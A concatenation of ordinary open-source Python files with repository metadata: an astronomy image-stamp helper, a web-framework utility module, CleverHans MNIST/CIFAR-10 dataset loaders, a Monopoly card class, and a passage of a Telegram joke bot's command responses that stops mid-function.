"size": "13753",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "indico/modules/events/abstracts/blueprint.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "33289"
},
{
"name": "HTML",
"bytes": "1420471"
},
{
"name": "JavaScript",
"bytes": "2362355"
},
{
"name": "Mako",
"bytes": "1527"
},
{
"name": "Python",
"bytes": "5550085"
},
{
"name": "SCSS",
"bytes": "486043"
},
{
"name": "Shell",
"bytes": "3877"
},
{
"name": "TeX",
"bytes": "23435"
},
{
"name": "XSLT",
"bytes": "1504"
}
],
"symlink_target": ""
} |
import os
import astropy.units as u
from astropy.io import fits
import numpy as np
from astropy.cosmology import FlatLambdaCDM
cosmo = FlatLambdaCDM(H0=70, Om0=0.3)
from .operator import Operator
from .. import standards
from ..filters import surveysetup
from ..external_links import file_humvi_compose
from .. import visualtools
class Imager(Operator):
def __init__(self, **kwargs):
"""
Imager, parent class for all obj operator for images
Params
------
Operator params:
/either
obj (object of class obsobj): with attributes ra, dec, dir_obj
/or
ra (float)
dec (float)
/either
dir_obj (string)
/or
dir_parent (string): attr dir_obj is set to dir_parent+'SDSSJXXXX+XXXX/'
survey (str):
survey of the photometric system
if not provided, use self.obj.survey. Raise exception if self.obj.survey does not exist.
z=-1 (float):
redshift, if not provided, use self.obj.z or self.obj.sdss.z. It does not automatically query sdss to get z. If nothing is pecified then set to -1.
center_mode='n/2' (str):
how is image center defined in case of even n, 'n/2' or 'n/2-1'. Should be set to n/2-1 if the image is downloaded from HSC quarry.
Attributes
----------
Operator Attributes:
obj (instance of objObj)
ra (float)
dec (float)
dir_obj (string)
survey (str): e.g., 'hsc'
survey of the photometric system
z (float):
redshift
pixsize (astropy angle quantity):
in unit of arcsec
pixelscale (astropy pixscale quantity):
for pixel and arcsec conversion
"""
super(Imager, self).__init__(**kwargs)
# set survey
if hasattr(self.obj, 'survey'):
default_survey = self.obj.survey
self.survey = kwargs.pop('survey', default_survey)
else:
self.survey = kwargs.pop('survey')
# set up obj.survey
if self.survey == 'hsc':
self.obj.add_hsc()
elif self.survey == 'sdss':
self.obj.add_sdss()
# set z
if hasattr(self.obj, 'z'):
self.z = kwargs.pop('z', self.obj.z)
elif hasattr(self.obj, 'sdss'):
self.z = kwargs.pop('z', self.obj.sdss.z)
elif 'z' in kwargs:
self.z = kwargs.pop('z')
else:
print("[imager] not redshift used, assuming -1")
self.z = -1
# set center_mode
self.center_mode = kwargs.pop('center_mode', 'n/2')
# set pixsize
self.pixsize = surveysetup.pixsize[self.survey]
self.pixelscale = u.pixel_scale(self.pixsize/u.pixel)
def get_fp_stamp(self, band):
return self.dir_obj + self.get_fn_stamp(band)
def get_fn_stamp(self, band):
return 'stamp-{0}.fits'.format(band)
def get_fp_psf(self, band):
return self.dir_obj + self.get_fn_psf(band)
def get_fn_psf(self, band):
return 'psf-{0}.fits'.format(band)
def get_fp_stamp_line(self, line):
""" e.g., stamp-OIII5008.fits, for stamp in observed frame in flux """
return self.dir_obj+'stamp-{0}.fits'.format(line)
def get_fp_stamp_line_I(self, line):
""" e.g., stamp-OIII5008_I.fits for stamp in rest frame in intensity"""
return self.dir_obj+'stamp-{0}_I.fits'.format(line)
def get_fp_stamp_img(self, imgtag):
""" e.g., stamp-{imgtag}.fits"""
return self.dir_obj+'stamp-{imgtag}.fits'.format(imgtag=imgtag)
def get_stamp_img(self, imgtag, wunit=False):
""" return the image as numpy array """
fn_img = self.get_fp_stamp_img(imgtag=imgtag)
hdus = fits.open(fn_img)
if wunit:
img = hdus[0].data * u.Unit(hdus[0].header['BUNIT'])
else:
img = hdus[0].data
return img
def _theta_to_pix(self, theta):
""" convert an angular quantity (*u.arcsec) theta to pixel scale (float) """
return (theta.to(u.pix, self.pixelscale)/u.pix).to(u.dimensionless_unscaled)
def _pix_to_theta(self, pix, wunit=True):
""" convert pix (float) to angular quantity (*u.arcsec) """
result = (pix*u.pix).to(u.arcsec, self.pixelscale)
if wunit:
return result
else:
return (result/u.arcsec).to(u.dimensionless_unscaled)
def _theta_to_kpc(self, theta, wunit=True):
result = (theta*self._get_kpc_proper_per_arcsec()).to(u.kpc)
if wunit:
return result
else:
return (result/u.kpc).to(u.dimensionless_unscaled)
def _get_kpc_proper_per_arcsec(self):
return 1./cosmo.arcsec_per_kpc_proper(self.z)
def _get_xc_yc(self, img):
""" return (xc, yc) the coordinate of image center given image, according to self.center_mode """
xc, yc = standards.get_img_xycenter(img, center_mode=self.center_mode)
return xc, yc
def make_colorimg(self, bands ='riz', img_type='stamp', s=[1.0, 1.1, 1.0], p=[1.6, 1.6], overwrite=False):
"""
make color composit image using external package HumVI. Example file name: 'color_stamp-riz.png'.
See Humvi documentation -- https://github.com/drphilmarshall/HumVI
Params
------
bands ='riz'
img_type='stamp'
s=[1.0, 1.1, 1.0]
humvi params for color balance. Default is set to bring out the middle band.
p=[1.6, 1.6]
humvi params Q, alpha
overwrite=False
Return
------
status (bool)
"""
fn = self.dir_obj+'color_{img_type}-{bands}.png'.format(bands=bands, img_type=img_type)
fns_in = [self.dir_obj+img_type+'-'+band+'.fits' for band in bands[::-1]]
# set params, for example, commandparams = ' -s 1.0,1.1,1.0 -p 1.6,1.6 -o '
commandparams = ' -s {} -p {} -o '.format(','.join(np.array(s).astype('str')), ','.join(np.array(p).astype('str')))
if (not os.path.isfile(fn)) or overwrite:
commandfiles = '{0} {1} {2} {3}'.format(fn, fns_in[0], fns_in[1], fns_in[2])
commandHumVI = file_humvi_compose+commandparams+commandfiles
os.system(commandHumVI)
status = os.path.isfile(fn)
return status
def plot_stamp_linemap_I(self, line='OIII5008', overwrite=False, vmin=None, vmax=10.):
"""
plot line map I as png.
Params
------
self
line='OIII5008' (str)
overwrite=False (bool)
Return
------
status (bool)
"""
fn = self.get_fp_stamp_line_I(line=line)
fn_out = os.path.splitext(fn)[0]+'.png'
if not os.path.isfile(fn_out) or overwrite:
print("[decomposer] plotting linemap")
visualtools.fits_to_png(fn_in=fn, fn_out=fn_out, vmin=vmin, vmax=vmax, scaling='arcsinh')
else:
print("[decomposer] skip plotting linemap as files exist")
return os.path.isfile(fn_out)
| {
"content_hash": "924bfdbf6e673d7976d39b6093d2fa3c",
"timestamp": "",
"source": "github",
"line_count": 237,
"max_line_length": 151,
"avg_line_length": 26.18143459915612,
"alnum_prop": 0.6568896051571314,
"repo_name": "aileisun/bubbleimg",
"id": "7a109c7dba7598ea6b5fc2f3ffe4e4bd891387a8",
"size": "6236",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bubbleimg/obsobj/imager.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "422380"
}
],
"symlink_target": ""
} |
import inspect
import os
import sys
from datetime import datetime, date
import time
import logging
import json
from collections import Iterable
import copy
from bson.objectid import ObjectId
from turbo.log import util_log
try:
basestring
except Exception as e:
basestring = str
def to_list_str(value, encode=None):
"""recursively convert list content into string
:arg list value: The list that need to be converted.
:arg function encode: Function used to encode object.
"""
result = []
for index, v in enumerate(value):
if isinstance(v, dict):
result.append(to_dict_str(v, encode))
continue
if isinstance(v, list):
result.append(to_list_str(v, encode))
continue
if encode:
result.append(encode(v))
else:
result.append(default_encode(v))
return result
def to_dict_str(origin_value, encode=None):
"""recursively convert dict content into string
"""
value = copy.deepcopy(origin_value)
for k, v in value.items():
if isinstance(v, dict):
value[k] = to_dict_str(v, encode)
continue
if isinstance(v, list):
value[k] = to_list_str(v, encode)
continue
if encode:
value[k] = encode(v)
else:
value[k] = default_encode(v)
return value
def default_encode(v):
"""convert ObjectId, datetime, date into string
"""
if isinstance(v, ObjectId):
return unicode(v)
if isinstance(v, datetime):
return format_time(v)
if isinstance(v, date):
return format_time(v)
return v
def to_str(v, encode=None):
"""convert any list, dict, iterable and primitives object to string
"""
if isinstance(v, basestring):
return v
if isinstance(v, dict):
return to_dict_str(v, encode)
if isinstance(v, Iterable):
return to_list_str(v, encode)
if encode:
return encode(v)
else:
return default_encode(v)
def format_time(dt):
"""datetime format
"""
return time.mktime(dt.timetuple())
def to_objectid(objid):
"""字符对象转换成objectid
"""
if objid is None:
return objid
try:
objid = ObjectId(objid)
except:
util_log.error("%s is invalid objectid" % objid)
return None
return objid
def json_encode(data, **kwargs):
try:
return json.dumps(data, **kwargs)
except Exception as e:
util_log.error("Uncaught exception in json_encode", exc_info=True)
def json_decode(data, **kwargs):
try:
return json.loads(data, **kwargs)
except Exception as e:
util_log.error("Uncaught exception in json_decode", exc_info=True)
def to_int(value, default=None):
try:
return int(value)
except ValueError as e:
util_log.error(e)
def to_float(value, default=None):
try:
return float(value)
except ValueError as e:
util_log.error(e)
def to_datetime(t, micro=False):
if micro:
return datetime.fromtimestamp(t/1000)
else:
return datetime.fromtimestamp(t)
def to_time(t, micro=False):
if micro:
return time.mktime(t.timetuple())*1000
else:
return time.mktime(t.timetuple())
class Escape(object):
__slots__ = ['to_list_str', 'to_dict_str', 'default_encode', 'format_time', 'to_objectid',
'to_str', 'to_time', 'to_datetime', 'to_int', 'to_float', 'json_decode', 'json_encode', '__gl']
def __init__(self, module):
self.__gl = module
def __getattr__(self, name):
if name in self.__slots__:
return self.__gl.get(name)
raise AttributeError('escape has no attribute %s' % name)
escape = Escape(globals())
def get_base_dir(currfile, dir_level_num=3):
"""
find certain path according to currfile
"""
root_path = os.path.abspath(currfile)
for i in range(0, dir_level_num):
root_path = os.path.dirname(root_path)
return root_path
def join_sys_path(currfile, dir_level_num=3):
"""
find certain path then load into sys path
"""
if os.path.isdir(currfile):
root_path = currfile
else:
root_path = get_base_dir(currfile, dir_level_num)
sys.path.append(root_path)
def import_object(name, package_space=None):
if name.count('.') == 0:
return __import__(name, package_space, None)
parts = name.split('.')
obj = __import__('.'.join(parts[:-1]), package_space, None, [str(parts[-1])], 0)
try:
return getattr(obj, parts[-1])
except AttributeError:
raise ImportError("No module named %s" % parts[-1])
def camel_to_underscore(name):
"""
convert CamelCase style to under_score_case
"""
as_list = []
length = len(name)
for index, i in enumerate(name):
if index !=0 and index != length-1 and i.isupper():
as_list.append('_%s'%i.lower())
else:
as_list.append(i.lower())
return ''.join(as_list)
def remove_folder(path, foldername):
if not foldername:
return
if not os.path.isdir(path):
return
dir_content = os.listdir(path)
if not dir_content:
return
for item in dir_content:
child_path = os.path.join(path, item)
if not os.path.isdir(child_path):
continue
if item != foldername:
remove_folder(child_path, foldername)
continue
#os.rmdir can't be allowed to deldte not empty
for root, dirs, files in os.walk(child_path, topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
try:
os.rmdir(child_path)
except Exception as e:
raise e
def remove_file(path, filename):
if not filename:
return
if not os.path.isdir(path):
return
dir_content = os.listdir(path)
if not dir_content:
return
for item in dir_content:
child_path = os.path.join(path, item)
if os.path.isdir(child_path):
remove_file(child_path, filename)
continue
if item != filename:
continue
try:
os.remove(child_path)
except Exception as e:
raise e
def remove_extension(path, extension):
if not extension:
return
if not os.path.isdir(path):
return
dir_content = os.listdir(path)
if not dir_content:
return
for item in dir_content:
child_path = os.path.join(path, item)
if os.path.isdir(child_path):
remove_extension(child_path, extension)
continue
name, ext = os.path.splitext(item)
if ext != extension:
continue
try:
os.remove(child_path)
except Exception as e:
raise e
def build_index(model_list):
from turbo.model import BaseModel
for m in model_list:
for attr_name in dir(m):
attr = getattr(m, attr_name)
if inspect.isclass(attr) and issubclass(attr, BaseModel) and hasattr(attr, 'name'):
if hasattr(attr, 'index'):
for index in attr.index:
attr().create_index(index, background=True)
else:
print("model %s has no 'index' attribute"%attr.__name__)
| {
"content_hash": "584fb83f3c391137975081c88b90b7c5",
"timestamp": "",
"source": "github",
"line_count": 329,
"max_line_length": 103,
"avg_line_length": 23,
"alnum_prop": 0.5784326681643981,
"repo_name": "tao12345666333/app-turbo",
"id": "a6e14b95ebe750f040b657b65f1ea52713825d2b",
"size": "7605",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "turbo/util.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "1615"
},
{
"name": "JavaScript",
"bytes": "4046"
},
{
"name": "Python",
"bytes": "124548"
}
],
"symlink_target": ""
} |
"""Dataset class for CleverHans
"""
# pylint: disable=missing-docstring
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import array
import functools
import gzip
import operator
import os
import struct
import tempfile
import sys
import warnings
import numpy as np
import tensorflow as tf
try:
from tensorflow.python.keras.utils import np_utils
from tensorflow.keras.datasets import cifar10
except ImportError:
# In tf 1.8, np_utils doesn't seem to be publicly exposed.
# In later tf versions, it is, and in pre-tf keras it was too.
from tensorflow.python.keras import _impl
np_utils = _impl.keras.utils.np_utils
# In tf 1.8, "from tensorflow.keras.datasets import cifar10" doesn't work even though the module exists
cifar10 = tf.keras.datasets.cifar10
warnings.warn(
"Support for TensorFlow versions prior to 1.12 is deprecated."
" CleverHans using earlier versions may quit working on or after 2019-07-07."
)
from cleverhans import utils
class Dataset(object):
"""Abstract base class representing a dataset."""
# The number of classes in the dataset. Should be specified by subclasses.
NB_CLASSES = None
def __init__(self, kwargs=None):
if kwargs is None:
kwargs = {}
if "self" in kwargs:
del kwargs["self"]
self.kwargs = kwargs
def get_factory(self):
"""Returns a picklable callable that recreates the dataset."""
return Factory(type(self), self.kwargs)
def get_set(self, which_set):
"""Returns the training set or test set as an (x_data, y_data) tuple.
:param which_set: 'train' or 'test'
"""
return (getattr(self, "x_" + which_set), getattr(self, "y_" + which_set))
def to_tensorflow(self):
raise NotImplementedError()
@classmethod
def in_memory_dataset(cls, x, y, shuffle=None, repeat=True):
assert x.shape[0] == y.shape[0]
d = tf.data.Dataset.range(x.shape[0])
if repeat:
d = d.repeat()
if shuffle:
d = d.shuffle(shuffle)
def lookup(p):
return x[p], y[p]
d = d.map(lambda i: tf.py_func(lookup, [i], [tf.float32] * 2))
return d
class MNIST(Dataset):
"""The MNIST dataset"""
NB_CLASSES = 10
def __init__(
self,
train_start=0,
train_end=60000,
test_start=0,
test_end=10000,
center=False,
max_val=1.0,
):
kwargs = locals()
if "__class__" in kwargs:
del kwargs["__class__"]
super(MNIST, self).__init__(kwargs)
x_train, y_train, x_test, y_test = data_mnist(
train_start=train_start,
train_end=train_end,
test_start=test_start,
test_end=test_end,
)
if center:
x_train = x_train * 2.0 - 1.0
x_test = x_test * 2.0 - 1.0
x_train *= max_val
x_test *= max_val
self.x_train = x_train.astype("float32")
self.y_train = y_train.astype("float32")
self.x_test = x_test.astype("float32")
self.y_test = y_test.astype("float32")
def to_tensorflow(self, shuffle=4096):
return (
self.in_memory_dataset(self.x_train, self.y_train, shuffle),
self.in_memory_dataset(self.x_test, self.y_test, repeat=False),
)
class CIFAR10(Dataset):
"""The CIFAR-10 dataset"""
NB_CLASSES = 10
LABEL_NAMES = [
"airplane",
"automobile",
"bird",
"cat",
"deer",
"dog",
"frog",
"horse",
"ship",
"truck",
]
def __init__(
self,
train_start=0,
train_end=60000,
test_start=0,
test_end=10000,
center=False,
max_val=1.0,
):
kwargs = locals()
if "__class__" in kwargs:
del kwargs["__class__"]
super(CIFAR10, self).__init__(kwargs)
packed = data_cifar10(
train_start=train_start,
train_end=train_end,
test_start=test_start,
test_end=test_end,
)
x_train, y_train, x_test, y_test = packed
if center:
x_train = x_train * 2.0 - 1.0
x_test = x_test * 2.0 - 1.0
x_train *= max_val
x_test *= max_val
self.x_train = x_train
self.y_train = y_train
self.x_test = x_test
self.y_test = y_test
self.max_val = max_val
def to_tensorflow(self, shuffle=4096):
# This is much more efficient with data augmentation, see tutorials.
return (
self.in_memory_dataset(self.x_train, self.y_train, shuffle),
self.in_memory_dataset(self.x_test, self.y_test, repeat=False),
)
class Factory(object):
"""
A callable that creates an object of the specified type and configuration.
"""
def __init__(self, cls, kwargs):
self.cls = cls
self.kwargs = kwargs
def __call__(self):
"""Returns the created object."""
return self.cls(**self.kwargs)
def maybe_download_file(url, datadir=None, force=False):
try:
from urllib.request import urlretrieve
except ImportError:
from urllib import urlretrieve
if not datadir:
datadir = tempfile.gettempdir()
file_name = url[url.rfind("/") + 1 :]
dest_file = os.path.join(datadir, file_name)
isfile = os.path.isfile(dest_file)
if force or not isfile:
urlretrieve(url, dest_file)
return dest_file
def download_and_parse_mnist_file(file_name, datadir=None, force=False):
url = os.path.join('https://storage.googleapis.com/cvdf-datasets/mnist/', file_name)
file_name = maybe_download_file(url, datadir=datadir, force=force)
# Open the file and unzip it if necessary
if os.path.splitext(file_name)[1] == ".gz":
open_fn = gzip.open
else:
open_fn = open
# Parse the file
with open_fn(file_name, "rb") as file_descriptor:
header = file_descriptor.read(4)
assert len(header) == 4
zeros, data_type, n_dims = struct.unpack(">HBB", header)
assert zeros == 0
hex_to_data_type = {
0x08: "B",
0x09: "b",
0x0B: "h",
0x0C: "i",
0x0D: "f",
0x0E: "d",
}
data_type = hex_to_data_type[data_type]
# data_type unicode to ascii conversion (Python2 fix)
if sys.version_info[0] < 3:
data_type = data_type.encode("ascii", "ignore")
dim_sizes = struct.unpack(">" + "I" * n_dims, file_descriptor.read(4 * n_dims))
data = array.array(data_type, file_descriptor.read())
data.byteswap()
desired_items = functools.reduce(operator.mul, dim_sizes)
assert len(data) == desired_items
return np.array(data).reshape(dim_sizes)
def data_mnist(
datadir=tempfile.gettempdir(),
train_start=0,
train_end=60000,
test_start=0,
test_end=10000,
):
"""
Load and preprocess MNIST dataset
:param datadir: path to folder where data should be stored
:param train_start: index of first training set example
:param train_end: index of last training set example
:param test_start: index of first test set example
:param test_end: index of last test set example
:return: tuple of four arrays containing training data, training labels,
testing data and testing labels.
"""
assert isinstance(train_start, int)
assert isinstance(train_end, int)
assert isinstance(test_start, int)
assert isinstance(test_end, int)
X_train = (
download_and_parse_mnist_file("train-images-idx3-ubyte.gz", datadir=datadir)
/ 255.0
)
Y_train = download_and_parse_mnist_file(
"train-labels-idx1-ubyte.gz", datadir=datadir
)
X_test = (
download_and_parse_mnist_file("t10k-images-idx3-ubyte.gz", datadir=datadir)
/ 255.0
)
Y_test = download_and_parse_mnist_file("t10k-labels-idx1-ubyte.gz", datadir=datadir)
X_train = np.expand_dims(X_train, -1)
X_test = np.expand_dims(X_test, -1)
X_train = X_train[train_start:train_end]
Y_train = Y_train[train_start:train_end]
X_test = X_test[test_start:test_end]
Y_test = Y_test[test_start:test_end]
Y_train = utils.to_categorical(Y_train, nb_classes=10)
Y_test = utils.to_categorical(Y_test, nb_classes=10)
return X_train, Y_train, X_test, Y_test
def data_cifar10(train_start=0, train_end=50000, test_start=0, test_end=10000):
"""
Preprocess CIFAR10 dataset
:return:
"""
# These values are specific to CIFAR10
img_rows = 32
img_cols = 32
nb_classes = 10
# the data, shuffled and split between train and test sets
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
if tf.keras.backend.image_data_format() == "channels_first":
x_train = x_train.reshape(x_train.shape[0], 3, img_rows, img_cols)
x_test = x_test.reshape(x_test.shape[0], 3, img_rows, img_cols)
else:
x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 3)
x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 3)
x_train = x_train.astype("float32")
x_test = x_test.astype("float32")
x_train /= 255
x_test /= 255
print("x_train shape:", x_train.shape)
print(x_train.shape[0], "train samples")
print(x_test.shape[0], "test samples")
# convert class vectors to binary class matrices
y_train = np_utils.to_categorical(y_train, nb_classes)
y_test = np_utils.to_categorical(y_test, nb_classes)
x_train = x_train[train_start:train_end, :, :, :]
y_train = y_train[train_start:train_end, :]
x_test = x_test[test_start:test_end, :]
y_test = y_test[test_start:test_end, :]
return x_train, y_train, x_test, y_test
| {
"content_hash": "9d6dd508b6e3be9402b0ee9d61e43737",
"timestamp": "",
"source": "github",
"line_count": 347,
"max_line_length": 107,
"avg_line_length": 28.95100864553314,
"alnum_prop": 0.5932709536133784,
"repo_name": "cleverhans-lab/cleverhans",
"id": "53cdd70a0f74ff352abf0844137f2a6be9a2de18",
"size": "10046",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cleverhans_v3.1.0/cleverhans/dataset.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "242"
},
{
"name": "HTML",
"bytes": "64"
},
{
"name": "Makefile",
"bytes": "836"
},
{
"name": "Python",
"bytes": "1016809"
},
{
"name": "Shell",
"bytes": "2831"
}
],
"symlink_target": ""
} |
from .card import Card
class GoBackThreeSpaces(Card):
'''
Go back three spaces.
'''
def play(self, game, current_player):
# We defer this import to avoid a circular reference...
from ..game import Board
# We move the player back three squares...
current_player.state.square -= 3
if current_player.state.square < 0:
current_player.state.square += Board.NUMBER_OF_SQUARES
game.player_has_changed_square(current_player)
| {
"content_hash": "dae9b3ad90ee8966c60d7d603c945585",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 66,
"avg_line_length": 25,
"alnum_prop": 0.632,
"repo_name": "richard-shepherd/monopyly",
"id": "6048ef71b4f3d0848d8e07efd86dcc76e3c921d0",
"size": "500",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "monopyly/cards/go_back_three_spaces.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C#",
"bytes": "57628"
},
{
"name": "Python",
"bytes": "2136924"
},
{
"name": "Shell",
"bytes": "474"
}
],
"symlink_target": ""
} |
import requests
import time
import sys
import datetime
import csv
import random
import re
import json
import traceback
import os
import telegram
from pydblite import Base #The PyDbLite stuff
import builtins
messagesSent = 0
spamLimitTime = 15
spamArray = {}
def helpResponse():
response = "/goodmorning - say hello\n"
response += "/goodnight - say goodbye\n"
response += "/shotty - settle disputes over who gets to ride shotgun\n"
response += "/snail words - sneeple have infiltrated the government\n"
response += "/fight - Fight someone. Reply to a message to fight whoever wrote it\n"
response += "/objection - reply to a message to object to its contents\n"
response += "/pick Name Name Name - the bot will pick someone or something from the list\n"
response += "/fmk Name or /fmk Name Name Name - the bot will answer your burning questions\n"
response += "/age - learn how long this instance of the bot has been running\n"
response += "/yesorno - let me guide your life choices\n"
response += "/8ball - ask the emojic 8ball a question\n"
response += "/summon Name - summon somebody to your chat\n"
response += "/adlib - learn about this bot's ability to ad lib posts\n"
response += "/more - extra commands"
return response
def moreResponse():
response = "/ping - returns pong\n"
response = "/expand - expands dong\n"
response += "/meme - only the dankest\n"
response += "/john_madden - UUUUUUUUU\n"
response += "/john_cena - THE UNDERTAKER\n"
response += "/gtg - mom\'s here\n"
response += "/yiss or /yiss word - aww yiss\n"
response += "/smash - a catchphrase\n"
response += "/screams - communicate your internal anguish\n"
response += "/essay - fuck\n"
response += "/community - learn about commands other people made, if they wrote about them"
return response
def adlibResponse():
response = "Ad lib commands will be replaced with appropriate words in a response by the bot.\n"
response += "/whodefine Name, Name, Name, ... - define a list to select with /who\n"
response += "/whocoulditbe - display the defined list\n"
response += "/me - use this to insert yourself into a story.\n"
response += "/who - replaced with a person or thing from the /whodefine list; will return [undefined] if none is found.\n"
response += "/noun - replaced with a noun (person, place, or thing)\n"
response += "/verb - replaced with a verb in the present tense\n"
response += "/verbed - replaced with a verb in the past tense\n"
response += "/verbing - replaced with a verb in the present participle (i.e. walking)\n"
response += "/adjective - replaced with an adjective\n"
response += "/adverb - replaced with an adverb\n"
response += "/number - replaced with a number as a word (ie three)\n"
response += "Any of these commands can be given with a capitalized first letter (ie /Noun) to guarantee the first letter of the returned word will be capitalized, or in all caps (ie /VERB) to get a word in all caps.\n"
return response
def spamCheck(chat_id, date):
global spamArray
global spamLimitTime
try:
spamArray[chat_id]['checking'] = True
except Exception:
spamArray[chat_id] = {'checking': True, 'spamTimestamp': 0}
if time.mktime(date.timetuple()) - spamLimitTime > spamArray[chat_id]['spamTimestamp']:
spamArray[chat_id]['spamTimestamp'] = time.mktime(date.timetuple())
return True
else:
return False
def atReply():
x = random.randint(0, 5)
if x == 0:
return "haha"
elif x == 1:
return "good, good"
elif x == 2:
return "Don't you have someone else to be bothering?"
elif x == 3:
return "nah"
elif x == 4:
return "lmao"
elif x == 5:
return "shhhhhhhhhhh"
def smashCommand():
x = random.randint(0, 11)
response = ""
if x == 0:
response = "I'M REALLY FEELIN\' IT"
elif x == 1:
response = "SHOW ME YA MOVES"
elif x == 2:
response = "HYES"
elif x == 3:
response = "okey"
elif x == 4:
response = "YOU'RE TOO SLOW"
elif x == 5:
response = "HAIIIIIII~"
elif x == 6:
response = "I fight for my friends."
elif x == 7:
response = "You\'ll get no sympathy from me."
elif x == 8:
response = "TIME TO TIP THE SCALES"
elif x == 9:
response = "*extends hand* C'MON"
elif x == 10:
response = "FIYURRR"
elif x == 11:
response = "WA, WA, WAAAAH"
return response
def screamsCommand():
x = random.randint(0, 3)
response = ""
if x == 0:
response = "AHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH"
elif x == 1:
response = "UGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH"
elif x == 2:
response = "AUGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH"
elif x == 3:
response = "?!!?!?!?!?!!!?!!!?!!?!!?!?!?!?!?!?!?!!!!!!???!??!?!?!?!?!??!??!!?!"
return response
def fmk(options):
if len(options) == 1:
x = random.randint(1, 3)
if x == 1:
return "Fuck"
elif x == 2:
return "Marry"
elif x == 3:
return "Kill"
elif len(options) == 3:
x = random.randint(1, 6)
if x == 1:
return "Fuck: " + options[0] + ". Marry: " + options[1] + ". Kill: " + options[2] + "."
elif x == 2:
return "Fuck: " + options[0] + ". Marry: " + options[2] + ". Kill: " + options[1] + "."
elif x == 3:
return "Fuck: " + options[1] + ". Marry: " + options[0] + ". Kill: " + options[2] + "."
elif x == 4:
return "Fuck: " + options[1] + ". Marry: " + options[2] + ". Kill: " + options[0] + "."
elif x == 5:
return "Fuck: " + options[2] + ". Marry: " + options[1] + ". Kill: " + options[0] + "."
elif x == 6:
return "Fuck: " + options[2] + ". Marry: " + options[0] + ". Kill: " + options[1] + "."
else:
return "Usage: /fmk Name or /fmk Name Name Name"
def snailResponse(messageText):
try:
result = ""
for modifyingWord in re.split(r'[@\s*]', messageText.lower()):
if modifyingWord != "/snail":
result += "sn" + modifyingWord[first_vowel(modifyingWord):] + " "
return result
except Exception:
return "Usage: /snail word - NO WEIRD CHARACTERS."
def objectionResponse(currentMessage):
try:
if currentMessage.reply_to_message.from_user.first_name.lower() == "adamtestbot":
return "Objecting to me, " + currentMessage.from_user.first_name + "? Overruled."
else:
return currentMessage.from_user.first_name.upper() + " OBJECTS TO WHAT " + currentMessage.reply_to_message.from_user.first_name.upper() + " SAID HERE!"
except Exception: #reply_to_message didn't exist
return "Object to messages by replying to them with /objection."
def ageCommand(instanceAge):
weeks = int(instanceAge / (3600 * 24 * 7))
days = int((instanceAge - (weeks * 3600 * 24 * 7)) / (3600 * 24))
hours = int((instanceAge - (weeks * 3600 * 24 * 7) - (days * (3600 * 24))) / 3600)
minutes = int((instanceAge - (weeks * 3600 * 24 * 7) - (days * (3600 * 24)) - (hours * 3600)) / 60)
seconds = int((instanceAge % 60))
stringWeeks = str(weeks) + "w"
stringDays = str(days) + "d"
stringHours = ""
if hours < 10:
stringHours = "0" + str(hours)
else:
stringHours = str(hours)
stringHours += "h"
stringMinutes = ""
if minutes < 10:
stringMinutes = "0" + str(minutes)
else:
stringMinutes = str(minutes)
stringMinutes += "m"
stringSeconds = ""
if seconds < 10:
stringSeconds = "0" + str(seconds)
else:
stringSeconds = str(seconds)
stringSeconds += "s"
stringDisplay = ""
if weeks > 0:
stringDisplay += stringWeeks + stringDays + stringHours + stringMinutes + stringSeconds
elif days > 0:
stringDisplay += stringDays + stringHours + stringMinutes + stringSeconds
elif hours > 0:
stringDisplay += stringHours + stringMinutes + stringSeconds
elif minutes > 0:
stringDisplay += stringMinutes + stringSeconds
else:
stringDisplay += stringSeconds
return stringDisplay
def eightBall():
x = random.randint(0, 15)
if x == 0:
return telegram.emoji.Emoji.FISTED_HAND_SIGN + telegram.emoji.Emoji.SPLASHING_SWEAT_SYMBOL
elif x == 1:
return telegram.emoji.Emoji.POUTING_FACE
elif x == 2:
return telegram.emoji.Emoji.THUMBS_UP_SIGN
elif x == 3:
return telegram.emoji.Emoji.SMILING_FACE_WITH_HEART_SHAPED_EYES
elif x == 4:
return telegram.emoji.Emoji.DISAPPOINTED_FACE
elif x == 5:
return telegram.emoji.Emoji.UNAMUSED_FACE
elif x == 6:
return telegram.emoji.Emoji.WEARY_FACE
elif x == 7:
return telegram.emoji.Emoji.FIRE + telegram.emoji.Emoji.WEARY_FACE + telegram.emoji.Emoji.FIRE
elif x == 8:
return telegram.emoji.Emoji.PISTOL + telegram.emoji.Emoji.FEARFUL_FACE
elif x == 9:
return telegram.emoji.Emoji.SMILING_FACE_WITH_OPEN_MOUTH_AND_COLD_SWEAT
elif x == 10:
return telegram.emoji.Emoji.HEART_DECORATION
elif x == 11:
return telegram.emoji.Emoji.THUMBS_DOWN_SIGN
elif x == 12:
return telegram.emoji.Emoji.CRYING_FACE
elif x == 13:
return telegram.emoji.Emoji.SMILING_FACE
elif x == 14:
return telegram.emoji.Emoji.FEARFUL_FACE
elif x == 15:
return telegram.emoji.Emoji.SMIRKING_FACE
def isMoom(parsedCommand):
try:
i = 1
if parsedCommand.lower()[0] == "/" and parsedCommand.lower()[i] == "m":
i += 1
while parsedCommand.lower()[i] == "o":
i += 1
if parsedCommand.lower()[i] == "m" and i + 1 == len(parsedCommand) and i > 3:
return True
else:
return False
else:
return False
